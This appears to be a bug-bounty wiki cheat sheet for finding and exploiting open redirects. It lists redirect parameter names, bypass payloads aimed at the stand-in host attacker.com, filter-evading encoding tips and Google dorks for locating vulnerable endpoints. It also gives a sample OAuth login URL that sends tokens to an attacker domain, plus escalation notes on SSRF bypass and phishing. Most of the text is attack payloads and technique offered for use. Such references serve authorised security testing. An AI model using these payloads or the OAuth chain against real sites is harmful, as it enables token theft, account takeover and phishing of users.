Very easy to find, and chains effectively with OAuth for token theft leading to account takeover.

return, return_url, rUrl, cancelUrl, redirect, goto, returnTo, returnUrl,
r_url, redirectTo, redirectUrl, dest, continue, next, window, back

\/attacker.com
\attacker.com
//attacker.com
//theirsite@attacker.com
/\/attacker.com
https://attacker.com%3F.theirsite.com/
////attacker.com
/%0D/attacker.com
/%2F/attacker.com
/%5Cattacker.com
//google%E3%80%82com

Encoding tip: Always encode & ? # / \ as %26 %3F %23 %2F %5C to force the browser to decode after the redirect, bypassing server-side filters that check the raw string.

site:target.com inurl:redirect=
site:target.com inurl:return_url=
site:target.com inurl:goto=

/login?client_id=123&redirect_url=https://target.com/oauth/callback?goto=https://attacker.com/

The OAuth token is appended to the redirect URL. If the redirect goes to an attacker-controlled domain, the token lands in the attacker's server logs = account takeover.

• Browser autocorrect – /attacker.com may be normalized by the browser * Flawed validator logic – validator checks only if their domain is a substring: https://attacker.com?x=theirsite.com * Data URLs – data:text/html;base64,… * URL decoding – try encoded slashes %2F%2Fattacker.com'' * Combining techniques – chain encoding + partial domain match ===== Escalation ===== * Chain with OAuth: redirect_uri bypass = token theft = account takeover * Use as SSRF bypass – open redirect on target used to reach internal services * Phishing – bounce through trusted domain to attacker page ===== See Also ===== * SSRF Testing * Bug Chaining * TBHM Auth & Session * Methodology Index